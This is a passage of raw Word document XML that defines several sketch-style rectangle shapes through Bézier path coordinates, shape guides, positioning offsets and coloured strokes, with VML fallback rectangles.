                                <a:pt x="756030" y="-13623"/>
                                <a:pt x="794621" y="22999"/>
                                <a:pt x="990854" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1187087" y="-22999"/>
                                <a:pt x="1303815" y="49378"/>
                                <a:pt x="1581150" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1598191" y="121616"/>
                                <a:pt x="1555816" y="271175"/>
                                <a:pt x="1581150" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1606484" y="784957"/>
                                <a:pt x="1545414" y="884366"/>
                                <a:pt x="1581150" y="980694"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1616886" y="1077022"/>
                                <a:pt x="1571802" y="1380670"/>
                                <a:pt x="1581150" y="1483614"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1590498" y="1586558"/>
                                <a:pt x="1568091" y="1808870"/>
                                <a:pt x="1581150" y="1911096"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1594209" y="2013322"/>
                                <a:pt x="1580947" y="2253308"/>
                                <a:pt x="1581150" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1323817" y="2576006"/>
                                <a:pt x="1297112" y="2456744"/>
                                <a:pt x="1054100" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="811088" y="2572456"/>
                                <a:pt x="798898" y="2511737"/>
                                <a:pt x="558673" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="318448" y="2517463"/>
                                <a:pt x="204492" y="2470544"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-35710" y="2280366"/>
                                <a:pt x="25687" y="2171207"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-25687" y="1902445"/>
                                <a:pt x="32711" y="1758175"/>
                                <a:pt x="0" y="1533906"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32711" y="1309637"/>
                                <a:pt x="2904" y="1216577"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-2904" y="795103"/>
                                <a:pt x="26318" y="748773"/>
                                <a:pt x="0" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-26318" y="307359"/>
                                <a:pt x="33719" y="108309"/>
                                <a:pt x="0" y="0"/>
                              </a:cubicBezTo>
                              <a:close/>
                            </a:path>
                            <a:path w="1581150" h="2514600" stroke="0" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="166419" y="-60549"/>
                                <a:pt x="369439" y="51604"/>
                                <a:pt x="511238" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="653037" y="-51604"/>
                                <a:pt x="874968" y="52520"/>
                                <a:pt x="990854" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1106740" y="-52520"/>
                                <a:pt x="1414261" y="26454"/>
                                <a:pt x="1581150" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1612586" y="153225"/>
                                <a:pt x="1531554" y="317625"/>
                                <a:pt x="1581150" y="477774"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1630746" y="637923"/>
                                <a:pt x="1533831" y="825150"/>
                                <a:pt x="1581150" y="930402"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1628469" y="1035654"/>
                                <a:pt x="1551907" y="1193721"/>
                                <a:pt x="1581150" y="1383030"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1610393" y="1572339"/>
                                <a:pt x="1562117" y="1738140"/>
                                <a:pt x="1581150" y="1885950"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1600183" y="2033760"/>
                                <a:pt x="1523449" y="2380018"/>
                                <a:pt x="1581150" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1403261" y="2548383"/>
                                <a:pt x="1249143" y="2467219"/>
                                <a:pt x="1085723" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="922303" y="2561981"/>
                                <a:pt x="793385" y="2487364"/>
                                <a:pt x="558673" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="323961" y="2541836"/>
                                <a:pt x="246935" y="2507383"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-38751" y="2278287"/>
                                <a:pt x="15550" y="2251764"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-15550" y="1821888"/>
                                <a:pt x="49854" y="1668524"/>
                                <a:pt x="0" y="1559052"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-49854" y="1449580"/>
                                <a:pt x="32610" y="1227588"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32610" y="784092"/>
                                <a:pt x="28754" y="708345"/>
                                <a:pt x="0" y="452628"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-28754" y="196911"/>
                                <a:pt x="47029" y="1367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cmpd="thickThin">
                          <a:solidFill>
                            <a:srgbClr val="FF0000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E2E424" id="Rectangle 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:406.5pt;margin-top:13.95pt;width:124.5pt;height:198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" fillcolor="white [3201]" strokecolor="red" strokeweight="1pt">
                <v:stroke linestyle="thickTh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13807365" wp14:editId="1A441CA2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3329305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1609725" cy="2514600"/>
                <wp:effectExtent l="25400" t="25400" r="41275" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="1000321256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514600"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY0" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX1" fmla="*/ 520478 w 1609725"/>
                            <a:gd name="connsiteY1" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX2" fmla="*/ 1008761 w 1609725"/>
                            <a:gd name="connsiteY2" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX3" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY3" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX4" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY4" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX5" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY5" fmla="*/ 980694 h 2514600"/>
                            <a:gd name="connsiteX6" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY6" fmla="*/ 1483614 h 2514600"/>
                            <a:gd name="connsiteX7" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY7" fmla="*/ 1911096 h 2514600"/>
                            <a:gd name="connsiteX8" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY8" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX9" fmla="*/ 1073150 w 1609725"/>
                            <a:gd name="connsiteY9" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX10" fmla="*/ 568770 w 1609725"/>
                            <a:gd name="connsiteY10" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX11" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY11" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX12" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY12" fmla="*/ 2036826 h 2514600"/>
                            <a:gd name="connsiteX13" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY13" fmla="*/ 1533906 h 2514600"/>
                            <a:gd name="connsiteX14" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY14" fmla="*/ 1005840 h 2514600"/>
                            <a:gd name="connsiteX15" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY15" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX16" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY16" fmla="*/ 0 h 25146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609725" h="2514600" fill="none" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="207909" y="-61949"/>
                                <a:pt x="370309" y="16148"/>
                                <a:pt x="520478" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="670647" y="-16148"/>
                                <a:pt x="908991" y="7088"/>
                                <a:pt x="1008761" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1108531" y="-7088"/>
                                <a:pt x="1406421" y="69860"/>
                                <a:pt x="1609725" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1626766" y="121616"/>
                                <a:pt x="1584391" y="271175"/>
                                <a:pt x="1609725" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1635059" y="784957"/>
                                <a:pt x="1573989" y="884366"/>
                                <a:pt x="1609725" y="980694"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1645461" y="1077022"/>
                                <a:pt x="1600377" y="1380670"/>
                                <a:pt x="1609725" y="1483614"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1619073" y="1586558"/>
                                <a:pt x="1596666" y="1808870"/>
                                <a:pt x="1609725" y="1911096"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1622784" y="2013322"/>
                                <a:pt x="1609522" y="2253308"/>
                                <a:pt x="1609725" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1458955" y="2573339"/>
                                <a:pt x="1278671" y="2481890"/>
                                <a:pt x="1073150" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="867630" y="2547310"/>
                                <a:pt x="763161" y="2513398"/>
                                <a:pt x="568770" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="374379" y="2515802"/>
                                <a:pt x="125896" y="2492243"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-35710" y="2280366"/>
                                <a:pt x="25687" y="2171207"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-25687" y="1902445"/>
                                <a:pt x="32711" y="1758175"/>
                                <a:pt x="0" y="1533906"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32711" y="1309637"/>
                                <a:pt x="2904" y="1216577"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-2904" y="795103"/>
                                <a:pt x="26318" y="748773"/>
                                <a:pt x="0" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-26318" y="307359"/>
                                <a:pt x="33719" y="108309"/>
                                <a:pt x="0" y="0"/>
                              </a:cubicBezTo>
                              <a:close/>
                            </a:path>
                            <a:path w="1609725" h="2514600" stroke="0" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="258985" y="-58640"/>
                                <a:pt x="325689" y="6692"/>
                                <a:pt x="520478" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="715267" y="-6692"/>
                                <a:pt x="764762" y="39009"/>
                                <a:pt x="1008761" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1252760" y="-39009"/>
                                <a:pt x="1360845" y="42669"/>
                                <a:pt x="1609725" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1641161" y="153225"/>
                                <a:pt x="1560129" y="317625"/>
                                <a:pt x="1609725" y="477774"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1659321" y="637923"/>
                                <a:pt x="1562406" y="825150"/>
                                <a:pt x="1609725" y="930402"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1657044" y="1035654"/>
                                <a:pt x="1580482" y="1193721"/>
                                <a:pt x="1609725" y="1383030"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1638968" y="1572339"/>
                                <a:pt x="1590692" y="1738140"/>
                                <a:pt x="1609725" y="1885950"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1628758" y="2033760"/>
                                <a:pt x="1552024" y="2380018"/>
                                <a:pt x="1609725" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1398340" y="2574550"/>
                                <a:pt x="1355424" y="2474125"/>
                                <a:pt x="1105345" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="855266" y="2555075"/>
                                <a:pt x="719563" y="2457646"/>
                                <a:pt x="568770" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="417977" y="2571554"/>
                                <a:pt x="200927" y="2460341"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-38751" y="2278287"/>
                                <a:pt x="15550" y="2251764"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-15550" y="1821888"/>
                                <a:pt x="49854" y="1668524"/>
                                <a:pt x="0" y="1559052"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-49854" y="1449580"/>
                                <a:pt x="32610" y="1227588"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32610" y="784092"/>
                                <a:pt x="28754" y="708345"/>
                                <a:pt x="0" y="452628"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-28754" y="196911"/>
                                <a:pt x="47029" y="1367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cmpd="thickThin">
                          <a:solidFill>
                            <a:schemeClr val="accent2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5AD575" id="Rectangle 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:262.15pt;margin-top:13.45pt;width:126.75pt;height:198pt;z-index:2516561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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke linestyle="thickTh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5750765A" wp14:editId="0598F730">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1479550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>167640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1609725" cy="2514600"/>
                <wp:effectExtent l="25400" t="25400" r="41275" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="1366814636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514600"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY0" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX1" fmla="*/ 520478 w 1609725"/>
                            <a:gd name="connsiteY1" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX2" fmla="*/ 1008761 w 1609725"/>
                            <a:gd name="connsiteY2" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX3" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY3" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX4" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY4" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX5" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY5" fmla="*/ 980694 h 2514600"/>
                            <a:gd name="connsiteX6" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY6" fmla="*/ 1483614 h 2514600"/>
                            <a:gd name="connsiteX7" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY7" fmla="*/ 1911096 h 2514600"/>
                            <a:gd name="connsiteX8" fmla="*/ 1609725 w 1609725"/>
                            <a:gd name="connsiteY8" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX9" fmla="*/ 1073150 w 1609725"/>
                            <a:gd name="connsiteY9" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX10" fmla="*/ 568770 w 1609725"/>
                            <a:gd name="connsiteY10" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX11" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY11" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX12" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY12" fmla="*/ 2036826 h 2514600"/>
                            <a:gd name="connsiteX13" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY13" fmla="*/ 1533906 h 2514600"/>
                            <a:gd name="connsiteX14" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY14" fmla="*/ 1005840 h 2514600"/>
                            <a:gd name="connsiteX15" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY15" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX16" fmla="*/ 0 w 1609725"/>
                            <a:gd name="connsiteY16" fmla="*/ 0 h 25146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609725" h="2514600" fill="none" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="207909" y="-61949"/>
                                <a:pt x="370309" y="16148"/>
                                <a:pt x="520478" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="670647" y="-16148"/>
                                <a:pt x="908991" y="7088"/>
                                <a:pt x="1008761" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1108531" y="-7088"/>
                                <a:pt x="1406421" y="69860"/>
                                <a:pt x="1609725" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1626766" y="121616"/>
                                <a:pt x="1584391" y="271175"/>
                                <a:pt x="1609725" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1635059" y="784957"/>
                                <a:pt x="1573989" y="884366"/>
                                <a:pt x="1609725" y="980694"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1645461" y="1077022"/>
                                <a:pt x="1600377" y="1380670"/>
                                <a:pt x="1609725" y="1483614"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1619073" y="1586558"/>
                                <a:pt x="1596666" y="1808870"/>
                                <a:pt x="1609725" y="1911096"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1622784" y="2013322"/>
                                <a:pt x="1609522" y="2253308"/>
                                <a:pt x="1609725" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1458955" y="2573339"/>
                                <a:pt x="1278671" y="2481890"/>
                                <a:pt x="1073150" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="867630" y="2547310"/>
                                <a:pt x="763161" y="2513398"/>
                                <a:pt x="568770" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="374379" y="2515802"/>
                                <a:pt x="125896" y="2492243"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-35710" y="2280366"/>
                                <a:pt x="25687" y="2171207"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-25687" y="1902445"/>
                                <a:pt x="32711" y="1758175"/>
                                <a:pt x="0" y="1533906"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32711" y="1309637"/>
                                <a:pt x="2904" y="1216577"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-2904" y="795103"/>
                                <a:pt x="26318" y="748773"/>
                                <a:pt x="0" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-26318" y="307359"/>
                                <a:pt x="33719" y="108309"/>
                                <a:pt x="0" y="0"/>
                              </a:cubicBezTo>
                              <a:close/>
                            </a:path>
                            <a:path w="1609725" h="2514600" stroke="0" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="258985" y="-58640"/>
                                <a:pt x="325689" y="6692"/>
                                <a:pt x="520478" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="715267" y="-6692"/>
                                <a:pt x="764762" y="39009"/>
                                <a:pt x="1008761" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1252760" y="-39009"/>
                                <a:pt x="1360845" y="42669"/>
                                <a:pt x="1609725" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1641161" y="153225"/>
                                <a:pt x="1560129" y="317625"/>
                                <a:pt x="1609725" y="477774"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1659321" y="637923"/>
                                <a:pt x="1562406" y="825150"/>
                                <a:pt x="1609725" y="930402"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1657044" y="1035654"/>
                                <a:pt x="1580482" y="1193721"/>
                                <a:pt x="1609725" y="1383030"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1638968" y="1572339"/>
                                <a:pt x="1590692" y="1738140"/>
                                <a:pt x="1609725" y="1885950"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1628758" y="2033760"/>
                                <a:pt x="1552024" y="2380018"/>
                                <a:pt x="1609725" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1398340" y="2574550"/>
                                <a:pt x="1355424" y="2474125"/>
                                <a:pt x="1105345" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="855266" y="2555075"/>
                                <a:pt x="719563" y="2457646"/>
                                <a:pt x="568770" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="417977" y="2571554"/>
                                <a:pt x="200927" y="2460341"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-38751" y="2278287"/>
                                <a:pt x="15550" y="2251764"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-15550" y="1821888"/>
                                <a:pt x="49854" y="1668524"/>
                                <a:pt x="0" y="1559052"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-49854" y="1449580"/>
                                <a:pt x="32610" y="1227588"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32610" y="784092"/>
                                <a:pt x="28754" y="708345"/>
                                <a:pt x="0" y="452628"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-28754" y="196911"/>
                                <a:pt x="47029" y="1367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cmpd="thickThin"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63438A" id="Rectangle 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:116.5pt;margin-top:13.2pt;width:126.75pt;height:198pt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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="0095055D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="156082" w:themeColor="accent1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0039B48" wp14:editId="6BA4E79B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-212090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>158115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1555750" cy="2514600"/>
                <wp:effectExtent l="25400" t="25400" r="44450" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="2076735003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2514600"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY0" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX1" fmla="*/ 503026 w 1555750"/>
                            <a:gd name="connsiteY1" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX2" fmla="*/ 974937 w 1555750"/>
                            <a:gd name="connsiteY2" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX3" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY3" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX4" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY4" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX5" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY5" fmla="*/ 980694 h 2514600"/>
                            <a:gd name="connsiteX6" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY6" fmla="*/ 1483614 h 2514600"/>
                            <a:gd name="connsiteX7" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY7" fmla="*/ 1911096 h 2514600"/>
                            <a:gd name="connsiteX8" fmla="*/ 1555750 w 1555750"/>
                            <a:gd name="connsiteY8" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX9" fmla="*/ 1037167 w 1555750"/>
                            <a:gd name="connsiteY9" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX10" fmla="*/ 549698 w 1555750"/>
                            <a:gd name="connsiteY10" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX11" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY11" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX12" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY12" fmla="*/ 2036826 h 2514600"/>
                            <a:gd name="connsiteX13" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY13" fmla="*/ 1533906 h 2514600"/>
                            <a:gd name="connsiteX14" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY14" fmla="*/ 1005840 h 2514600"/>
                            <a:gd name="connsiteX15" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY15" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX16" fmla="*/ 0 w 1555750"/>
                            <a:gd name="connsiteY16" fmla="*/ 0 h 25146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555750" h="2514600" fill="none" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="205045" y="-38521"/>
                                <a:pt x="292824" y="19526"/>
                                <a:pt x="503026" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="713228" y="-19526"/>
                                <a:pt x="839884" y="31953"/>
                                <a:pt x="974937" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1109990" y="-31953"/>
                                <a:pt x="1411065" y="32508"/>
                                <a:pt x="1555750" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1572791" y="121616"/>
                                <a:pt x="1530416" y="271175"/>
                                <a:pt x="1555750" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1581084" y="784957"/>
                                <a:pt x="1520014" y="884366"/>
                                <a:pt x="1555750" y="980694"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1591486" y="1077022"/>
                                <a:pt x="1546402" y="1380670"/>
                                <a:pt x="1555750" y="1483614"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1565098" y="1586558"/>
                                <a:pt x="1542691" y="1808870"/>
                                <a:pt x="1555750" y="1911096"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1568809" y="2013322"/>
                                <a:pt x="1555547" y="2253308"/>
                                <a:pt x="1555750" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1419561" y="2540395"/>
                                <a:pt x="1251433" y="2503094"/>
                                <a:pt x="1037167" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="822901" y="2526106"/>
                                <a:pt x="718719" y="2498801"/>
                                <a:pt x="549698" y="2514600"/>
